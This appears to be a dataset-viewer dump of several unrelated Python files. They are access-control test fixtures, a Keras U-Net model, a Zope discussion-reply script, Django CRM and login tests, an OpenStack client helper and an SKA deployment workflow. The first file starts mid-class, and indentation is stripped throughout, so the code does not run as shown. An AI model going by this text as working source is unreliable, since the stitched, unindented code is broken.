'''
Collection of JSON used for testing.
'''
self.system_json = StringIO(
'''{
"serial": "536780dfe639468e8e23fc568006950d",
"timezone": "America/New_York",
"CurrentVersion": "0_0_0",
"HUBid": 40,
"Token": "5a12ff36eed2f0647a48af62e635eb8cfd4c5979",
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032"
}'''
)
self.nodes_json = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.members_json = StringIO(
'''[
{
"cardNumber": "313233343536373839",
"access_group": 123,
"phone_number": "1234567890",
"address": "1331 12th ave",
"city": "Altoona",
"state": "PA",
"zip_code": "16601",
"username": "BestName",
"first_name": "John",
"last_name": "Doe",
"email": "[email protected]",
"restricted_nodes": [0,9,8]
}
]'''
)
self.owners_json = StringIO(
'''[
{
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"cardNumber": "30393837363534333231",
"phone_number": null,
"address": null,
"city": null,
"state": null,
"zip_code": null,
"username": "OwnerUserName",
"first_name": "Jim",
"last_name": "John",
"email": "[email protected]"
}
]'''
)
self.permissions_json = StringIO(
'''[
{
"id": 1,
"name": "General Access",
"startTime": "20:20:20",
"endTime": "23:23:23",
"monday": true,
"tuesday": true,
"wednesday": true,
"thursday": true,
"friday": true,
"saturday": true,
"sunday": true,
"twenty_four_seven": false,
"default_fallback": true,
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"allowedNodes": [1, 4, 6]
}
]'''
)
# ----------------------------------- _alt ----------------------------------- #
self.system_json = StringIO(
'''{
"serial": "536780dfe639468e8e23fc568006950d",
"timezone": "America/New_York",
"CurrentVersion": "0_0_0",
"HUBid": 40,
"Token": "5a12ff36eed2f0647a48af62e635eb8cfd4c5979",
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032"
}'''
)
self.nodes_json_alt = StringIO(
'''[
{
"id": 1,
"name": "Test Node",
"mac": "0011223344556677",
"tool": false,
"door": false,
"qr_toggle": false,
"hub": 1,
"facility": "7659e76b-470c-4d5f-bff4-fcc120f08848",
"qr_code": null
}
]'''
)
self.members_json_alt = StringIO(
'''[
{
"cardNumber": "313233343536373839",
"access_group": 123,
"phone_number": "1234567890",
"address": "1331 12th ave",
"city": "Altoona",
"state": "PA",
"zip_code": "16601",
"username": "BestName",
"first_name": "John",
"last_name": "Doe",
"email": "[email protected]",
"restricted_nodes": [0,9,8]
}
]'''
)
self.owners_json_alt = StringIO(
'''[
{
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"cardNumber": "30393837363534333231",
"phone_number": null,
"address": null,
"city": null,
"state": null,
"zip_code": null,
"username": "OwnerUserName",
"first_name": "Jim",
"last_name": "John",
"email": "[email protected]"
}
]'''
)
self.permissions_json_alt = StringIO(
'''[
{
"id": 1,
"name": "General Access",
"startTime": "20:20:20",
"endTime": "23:23:23",
"monday": true,
"tuesday": true,
"wednesday": true,
"thursday": true,
"friday": true,
"saturday": true,
"sunday": true,
"twenty_four_seven": false,
"default_fallback": true,
"facility": "3b9fdc97-9649-4c80-8b48-10df647bd032",
"allowedNodes": [1, 4, 6]
}
]'''
)
def test_files_opened(self):
'''
Confirms that all the files are correctly opened and read.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.side_effect = [
self.system_json,
self.nodes_json, # Opened from conversion function.
self.owners_json, # Opened from owner check function.
self.members_json, # Opened from get_details function.
self.permissions_json, # Opened from get_group_details function.
]
self.assertAlmostEqual(rec_lookup.access_request(313131, '0011223344556677'), 2)
mock_open.assert_called()
def test_mac_to_id(self):
'''
Confirms that the mac address is converted to the node id.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json
node_id = rec_lookup.mac_to_id('0011223344556677')
mock_open.assert_called()
self.assertEqual(node_id, 1)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.nodes_json_alt
node_id = rec_lookup.mac_to_id('9911223344556677')
mock_open.assert_called()
self.assertEqual(node_id, '9911223344556677')
def test_is_owner(self):
'''
Confirms that the owner check function returns the correct value.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.owners_json
owner = rec_lookup.is_owner('30393837363534333231')
mock_open.assert_called()
self.assertTrue(owner)
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.owners_json_alt
owner = rec_lookup.is_owner('99393837363534333231')
mock_open.assert_called()
self.assertFalse(owner)
def test_get_details(self):
'''
Verifies that the correct details are returned.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.members_json
user = rec_lookup.get_details('313233343536373839')
mock_open.assert_called()
self.assertTrue(user['found'])
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.members_json_alt
user = rec_lookup.get_details('993233343536373839')
mock_open.assert_called()
self.assertFalse(user['found'])
def test_get_group_details(self):
'''
Verifies that the correct details are returned.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.permissions_json
group = rec_lookup.get_group_details(1)
mock_open.assert_called()
self.assertTrue(group['found'])
with patch('modules.rec_lookup.open') as mock_open:
mock_open.return_value = self.permissions_json_alt
group = rec_lookup.get_group_details(69)
mock_open.assert_called()
self.assertFalse(group['found'])
def test_access_request_combinations(self):
'''
Checks that the access request function returns the correct values.
'''
with patch('modules.rec_lookup.open') as mock_open:
mock_open.side_effect = [
self.system_json,
self.nodes_json, # Opened from conversion function.
self.owners_json, # Opened from owner check function.
self.members_json, # Opened from get_details function.
self.permissions_json, # Opened from get_group_details function.
]
self.assertEqual(
rec_lookup.access_request(313131, '0011223344556677'),
2
)
mock_open.assert_called()
if __name__ == '__main__':
unittest.main()
|
python
|
# author: Artan Zandian
# date: 2022-02-18
import tensorflow as tf
from tensorflow.keras.layers import (
Input,
Conv2D,
MaxPooling2D,
Dropout,
Conv2DTranspose,
concatenate,
)
def encoder_block(inputs=None, n_filters=32, dropout=0, max_pooling=True):
"""
Convolutional encoder block
Parameters
----------
inputs: tensor
Input tensor
n_filters: int
Number of convolutional layer channels
dropout: float
Dropout probability between 0 and 1
max_pooling: bool
Whether to MaxPooling2D for spatial dimensions reduction
Returns
-------
next_layer, skip_connection
Next layer for the downsampling section and skip connection outputs
"""
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(inputs)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(conv)
# Add dropout if existing
if dropout > 0:
conv = Dropout(dropout)(conv)
# Add MaxPooling2D with 2x2 pool_size
if max_pooling:
next_layer = MaxPooling2D(pool_size=(2, 2))(conv)
else:
next_layer = conv
skip_connection = conv # excluding maxpool from skip connection
return next_layer, skip_connection
def decoder_block(expansive_input, contractive_input, n_filters=32):
"""
Convolutional decoder block
Parameters
----------
expansive_input: tensor
Input tensor
contractive_input: tensor
Input tensor from matching encoder skip layer
n_filters: int
Number of convolutional layers' channels
Returns
-------
conv
Tensor of output layer
"""
up = Conv2DTranspose(
filters=n_filters, kernel_size=(3, 3), strides=2, padding="same"
)(expansive_input)
# Merge the previous output and the contractive_input
# The order of concatenation for channels doesn't matter
merge = concatenate([up, contractive_input], axis=3)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(merge)
conv = Conv2D(
filters=n_filters,
kernel_size=3,
activation="relu",
padding="same",
kernel_initializer="he_normal",
)(conv)
return conv
def U_Net(input_size=(320, 320, 3), n_filters=32, n_classes=1):
"""
U_Net model
Parameters
----------
input_size: tuple of integers
Input image dimension
n_filters: int
Number of convolutional layer channels
n_classes: int
Number of output classes
Returns
-------
model
tensorflow model
"""
inputs = Input(input_size)
# Encoder section
# ================
# Double the number of filters at each new step
# The first element of encoder_block is input to the next layer
eblock1 = encoder_block(inputs, n_filters)
eblock2 = encoder_block(eblock1[0], n_filters * 2)
eblock3 = encoder_block(eblock2[0], n_filters * 4)
eblock4 = encoder_block(eblock3[0], n_filters * 8, dropout=0.3)
eblock5 = encoder_block(eblock4[0], n_filters * 16, dropout=0.3, max_pooling=False)
# Decoder section
# ================
# Chain the output of the previous block as expansive_input and the corresponding contractive block output
# The second element of encoder_block is input to the skip connection
# Halving the number of filters of the previous block in each section
dblock6 = decoder_block(
expansive_input=eblock5[1],
contractive_input=eblock4[1],
n_filters=n_filters * 8,
)
dblock7 = decoder_block(
expansive_input=dblock6, contractive_input=eblock3[1], n_filters=n_filters * 4
)
dblock8 = decoder_block(
expansive_input=dblock7, contractive_input=eblock2[1], n_filters=n_filters * 2
)
dblock9 = decoder_block(
expansive_input=dblock8, contractive_input=eblock1[1], n_filters=n_filters
)
conv9 = Conv2D(
n_filters, 3, activation="relu", padding="same", kernel_initializer="he_normal"
)(dblock9)
# Add a 1x1 Conv2D (projection) layer with n_classes filters to adjust number of output channels
conv10 = Conv2D(filters=n_classes, kernel_size=1, padding="same")(conv9)
model = tf.keras.Model(inputs=inputs, outputs=conv10)
return model
if __name__ == "__main__":
model = U_Net((320, 320, 3), n_filters=32, n_classes=1)
|
python
|
##parameters=add='', edit='', preview=''
##
from Products.PythonScripts.standard import structured_text
from Products.CMFCore.utils import getUtilityByInterfaceName
from Products.CMFDefault.utils import decode
from Products.CMFDefault.utils import html_marshal
from Products.CMFDefault.utils import Message as _
atool = getUtilityByInterfaceName('Products.CMFCore.interfaces.IActionsTool')
form = context.REQUEST.form
is_preview = False
if add and \
context.validateHTML(**form) and \
context.discussion_reply(**form):
return
elif preview and \
context.validateHTML(**form):
is_preview = True
options = {}
title = form.get('title', context.Title())
text = form.get('text', '')
options['is_preview'] = is_preview
options['title'] = title
options['text'] = text
options['cooked_text'] = structured_text(text)
if is_preview:
hidden_vars = [ {'name': n, 'value': v}
for n, v in html_marshal(title=title, text=text) ]
else:
hidden_vars = []
buttons = []
target = atool.getActionInfo('object/reply', context)['url']
buttons.append( {'name': 'add', 'value': _(u'Add')} )
if is_preview:
buttons.append( {'name': 'edit', 'value': _(u'Edit')} )
else:
buttons.append( {'name': 'preview', 'value': _(u'Preview')} )
options['form'] = { 'action': target,
'listHiddenVarInfos': tuple(hidden_vars),
'listButtonInfos': tuple(buttons) }
return context.discussion_reply_template(**decode(options, script))
|
python
|
import pytest
from django.urls import reverse
from google.auth.exceptions import GoogleAuthError
from crm.factories import UserSocialAuthFactory, ProjectMessageFactory
from crm.models import ProjectMessage
@pytest.mark.django_db
def test_project_message_index(admin_app,
project_message,
project_message_factory):
project_message_factory.create()
url = reverse('crm_projectmessage_modeladmin_index')
admin_app.get(url)
@pytest.mark.django_db
def test_project_message_index_google_auth_error(admin_app,
mocker):
mocker.patch('crm.gmail_utils.sync', side_effect=GoogleAuthError)
url = reverse('crm_projectmessage_modeladmin_index')
r = admin_app.get(url)
assert len(r.context['messages']) == 1
assert 'Can't update messages' in r.text
@pytest.mark.django_db
def test_project_message_index_creates_message(default_site, gmail_service, admin_app, admin_user):
UserSocialAuthFactory(user=admin_user)
assert ProjectMessage.objects.count() == 0
url = reverse('crm_projectmessage_modeladmin_index')
admin_app.get(url)
assert ProjectMessage.objects.count() == 1
@pytest.mark.django_db
def test_project_message_inspect(admin_app,
project_message):
url = reverse('crm_projectmessage_modeladmin_inspect', kwargs={'instance_pk': project_message.pk})
admin_app.get(url)
@pytest.mark.django_db
def test_project_message_inspect_no_project(admin_app):
# https://sentry.io/share/issue/5ca8418a573d4ab59df0e1e5c34a1953/
project_message = ProjectMessageFactory(project=None)
url = reverse('crm_projectmessage_modeladmin_inspect', kwargs={'instance_pk': project_message.pk})
admin_app.get(url)
|
python
|
"""
Copyright 2015 INTEL RESEARCH AND INNOVATION IRELAND LIMITED
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import random
import heatclient.client as heatc
import keystoneclient.v2_0.client as keyc
import novaclient.client as novac
import adaptationengine_framework.configuration as cfg
LOGGER = logging.getLogger('syslog')
class OpenStackClients:
"""
Interfaces to the Openstack keystone, nova, and heat APIs
"""
@staticmethod
def get_keystone_client(
auth_url=None,
username=None,
password=None,
tenant_name=None
):
"""Generate a keystone client"""
LOGGER.debug("Generating keystone client")
os_url = auth_url or cfg.openstack__auth_url
os_user = username or cfg.openstack__username
os_pass = password or cfg.openstack__password
os_tenant = tenant_name or cfg.openstack__tenant
keystone_client = keyc.Client(
auth_url=os_url,
username=os_user,
password=os_pass,
tenant_name=os_tenant
)
LOGGER.debug("Generated keystone client")
return keystone_client
@staticmethod
def get_nova_client(
api_version='2',
username=None,
password=None,
tenant=None,
auth_url=None,
timeout=60
):
"""Generate a nova client"""
LOGGER.debug("Generating nova client")
os_url = auth_url or cfg.openstack__auth_url
os_user = username or cfg.openstack__username
os_pass = password or cfg.openstack__password
os_tenant = tenant or cfg.openstack__tenant
nova_client = novac.Client(
api_version,
os_user,
os_pass,
os_tenant,
os_url,
timeout=timeout,
)
LOGGER.debug("Generated nova client")
return nova_client
@staticmethod
def get_heat_client(keystone_client, admin_ks_client=None):
"""Generate a heat client"""
LOGGER.debug("Looking for heat endpoint")
endpoint_ks_client = admin_ks_client or keystone_client
heat_endpoint = OpenStackClients._find_endpoint(
endpoint_ks_client, 'heat', keystone_client.project_id
)
LOGGER.debug("Generating heat client")
heat_client = heatc.Client(
"1", # HEAT_API_VERSION
endpoint=heat_endpoint,
token=keystone_client.auth_token
)
LOGGER.debug("Generated heat client")
return heat_client
@staticmethod
def _find_endpoint(keystone_client, wanted_service, tenant_id=None):
"""Return the endpoint url for a named openstack service"""
if keystone_client is None:
LOGGER.error("Invalid keystone client")
return None
LOGGER.debug(
"Looking for endpoint for service [{}]".format(wanted_service)
)
endpoint = None
service_id = None
for ks_service in keystone_client.services.list():
LOGGER.debug(
"wanted:{}, name:{}, id:{}".format(
wanted_service, ks_service.name, ks_service.id
)
)
if ks_service.name == wanted_service:
service_id = ks_service.id
break
for ks_endpoint in keystone_client.endpoints.list():
LOGGER.debug(
"service_id:{}, endpoint.service_id:{}, "
"endpoint.internalurl:{}".format(
service_id, ks_endpoint.service_id, ks_endpoint.internalurl
)
)
if ks_endpoint.service_id == service_id:
endpoint = ks_endpoint.internalurl
break
LOGGER.debug("Apparent endpoint url [{}]".format(endpoint))
# openstack undocumented version difference #37891
try:
replacement_id = tenant_id or keystone_client.project_id
endpoint = endpoint.replace(
'%(tenant_id)s',
replacement_id
)
endpoint = endpoint.replace(
'$(tenant_id)s',
replacement_id
)
except AttributeError:
LOGGER.error(
"No endpoint found for service [{}] in Keystone".format(
wanted_service
)
)
LOGGER.debug(
"Endpoint url with tenant id [{}]".format(endpoint)
)
return endpoint
@staticmethod
def get_heat_client_for_stack(admin_keystone_client, stack_id):
"""
Generate a Heat client with persmissions to affect a particular stack
Heat doesn't let you look at stacks for other tenants,
so we need to keep trying tenants till we find the one who
owns the stack and return a heat client that will have access.
This all assumes that the keystone user is an admin with access
to give auth tokens for every tenant
"""
for tenant in admin_keystone_client.tenants.list():
try:
ks_tenant_client = OpenStackClients.get_keystone_client(
tenant_name=tenant.name
)
heat_client = OpenStackClients.get_heat_client(
ks_tenant_client,
admin_ks_client=admin_keystone_client
)
try:
heat_client.stacks.get(stack_id)
LOGGER.debug("Returning heat client")
return heat_client
except Exception, err:
LOGGER.debug(
"Stack doesn't belong to tenant {} anyway".format(
tenant.name
)
)
except Exception, err:
LOGGER.error("Exception accessing stacks: {}".format(err))
return None
@staticmethod
def get_openstack_clients():
"""Return keystone, heat, and nova clients"""
keystone_client = OpenStackClients.get_keystone_client()
heat_client = OpenStackClients.get_heat_client(keystone_client)
nova_client = OpenStackClients.get_nova_client()
return (keystone_client, nova_client, heat_client)
class OpenStackInterface:
"""An interface to perform some needed Openstack operations"""
def __init__(self):
"""Generate a nova client for the interface"""
LOGGER.debug("OpenStackInterface init")
self._nova_client = OpenStackClients.get_nova_client()
def get_migration_destination(self, vm_id):
"""get a random host id to move this vm to,
so long as it's not the one it's already on
"""
LOGGER.info("Looking for a host to move vm {} to...".format(vm_id))
hypervisor_list = self._nova_client.hypervisors.list()
valid_hypervisors = []
for hypervisor in hypervisor_list:
hypervisor_hosts = self._nova_client.hypervisors.search(
hypervisor.hypervisor_hostname,
servers=True
)
origin_hypervisor = False
for hypervisor_host in hypervisor_hosts:
try:
for server in hypervisor_host.servers:
if server.get('uuid', None) == vm_id:
origin_hypervisor = True
except AttributeError:
LOGGER.warn("No servers on this hypervisor")
if not origin_hypervisor:
valid_hypervisors.append(hypervisor)
if valid_hypervisors:
LOGGER.info(
"Found these hypervisors {}".format(valid_hypervisors)
)
rando_hype = random.choice(valid_hypervisors)
LOGGER.info(
"Returning this hypervisor [{}]".format(rando_hype)
)
return rando_hype.hypervisor_hostname
else:
LOGGER.warn("Could not find any other hypervisors")
return None
def get_migration_target(self, stack_id):
"""get a vm id from this stack"""
keystone_client = OpenStackClients.get_keystone_client()
heat_client = OpenStackClients.get_heat_client_for_stack(
keystone_client,
stack_id
)
LOGGER.info(
"Looking for a vm that belongs to stack {}".format(stack_id)
)
the_vms = []
for resource in heat_client.resources.list(stack_id):
if resource.resource_type == "OS::Nova::Server":
the_vms.append(resource.physical_resource_id)
LOGGER.info("Found these vms {}".format(the_vms))
rando_vm = random.choice(the_vms)
LOGGER.info("Returning this vm [{}]".format(rando_vm))
return rando_vm
def get_scale_value(self, vm_id):
"""TODO: get the flavour 'up' from this vm's current one"""
# TODO: actually get scale value
tmp_flavour = "2"
LOGGER.warn(
"Returning fake flavour {} for VM uuid {}".format(
tmp_flavour, vm_id
)
)
return tmp_flavour
def get_vm_hypervisor_mapping(self):
server_list = {}
hypvrs = self._nova_client.hypervisors.list()
for hype in hypvrs:
hype_obj = self._nova_client.hypervisors.search(
hype.hypervisor_hostname,
servers=True
)
for h in hype_obj:
try:
for server in h.servers:
server_list[server.get('uuid', None)] = h.hypervisor_hostname
except AttributeError:
pass
return server_list
|
python
|
from django.contrib.auth import authenticate
from django.test import TestCase
from django.urls import resolve
from .models import User
from .views import index_view, dashboard_view
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.decorators import login_required
class UserLoggedInTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.user.save()
def tearDown(self):
self.user.delete()
def test_correct(self):
user = authenticate(username="testuser", password="test.pass")
self.assertTrue((user is not None) and user.is_authenticated)
def test_wrong_username(self):
user = authenticate(username="user", password="test.pass")
self.assertFalse((user is not None) and user.is_authenticated)
def test_wrong_password(self):
user = authenticate(username="testuser", password="pass")
self.assertFalse((user is not None) and user.is_authenticated)
def test_user_permission(self):
self.assertFalse(self.user.is_superuser)
self.assertTrue(self.user.is_active)
self.assertFalse(self.user.is_staff)
class AdminLoggedInTest(TestCase):
def setUp(self):
self.admin = User.objects.create_superuser(
username="admin", password="admin.pass"
)
self.admin.save()
def teardown(self):
self.admin.delete()
def test_correct(self):
admin = authenticate(username="admin", password="admin.pass")
self.assertTrue((admin is not None) and admin.is_authenticated)
def test_wrong_username(self):
admin = authenticate(username="user", password="admin.pass")
self.assertFalse((admin is not None) and admin.is_authenticated)
def test_wrong_password(self):
admin = authenticate(username="admin", password="pass")
self.assertFalse((admin is not None) and admin.is_authenticated)
def test_superuser_permission(self):
self.assertTrue(self.admin.is_active)
self.assertTrue(self.admin.is_staff)
self.assertTrue(self.admin.is_superuser)
class DashboardPageTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.response = self.client.login(
username="testuser", password="test.pass"
)
@login_required
def test_user_logged_in(self):
assert self.user.is_authenticated
def test_root_url(self):
response = self.client.get("/")
self.assertEqual(response.status_code, 200)
def test_root_url_view(self):
dashboard_url = resolve("/")
self.assertEqual(dashboard_url.func, index_view)
def test_root_title(self):
response = self.client.get("/")
self.assertContains(response, "<title>TDrive</title>")
def test_root_template(self):
response = self.client.get("/")
self.assertTemplateUsed(response, "registration/index.html")
class LoginPageTest(TestCase):
def test_login_url(self):
response = self.client.get("/login/")
self.assertEqual(response.status_code, 200)
def test_login_title(self):
response = self.client.get("/login/")
self.assertContains(response, "<title>Login | TDrive</title>")
def test_login_template(self):
response = self.client.get("/login/")
self.assertTemplateUsed(response, "registration/login.html")
class UserLoggedOutTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.response = self.client.login(
username="testuser", password="test.pass"
)
def test_logout_url(self):
response = self.client.get("/logout/?next=/")
self.assertEqual(response['Location'], '/')
self.assertEqual(response.status_code, 302)
|
python
|
"""
Example Vis Receive workflow
"""
# pylint: disable=C0103
import logging
import ska_sdp_config
import os
# Initialise logging and configuration
logging.basicConfig()
log = logging.getLogger('main')
log.setLevel(logging.INFO)
config = ska_sdp_config.Config()
# Find processing block configuration from the configuration.
workflow = {
'id': 'vis_receive',
'version': '0.1.0',
'type': 'realtime'
}
log.info("Waiting for processing block...")
for txn in config.txn():
pb = txn.take_processing_block_by_workflow(
workflow, config.client_lease)
if pb is not None:
continue
txn.loop(wait=True)
# Show
log.info("Claimed processing block %s", pb)
# Deploy Vis Receive with 1 worker.
log.info("Deploying Vis Receive...")
deploy_id = pb.pb_id + "-vis-receive"
deploy = ska_sdp_config.Deployment(
deploy_id, "helm", {
'chart': 'vis-receive', # Helm chart deploy/charts/vis-receive
})
for txn in config.txn():
txn.create_deployment(deploy)
try:
# Just idle until processing block or we lose ownership
log.info("Done, now idling...")
for txn in config.txn():
if not txn.is_processing_block_owner(pb.pb_id):
break
txn.loop(True)
finally:
# Clean up vis receive deployment.
for txn in config.txn():
txn.delete_deployment(deploy)
config.close()
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.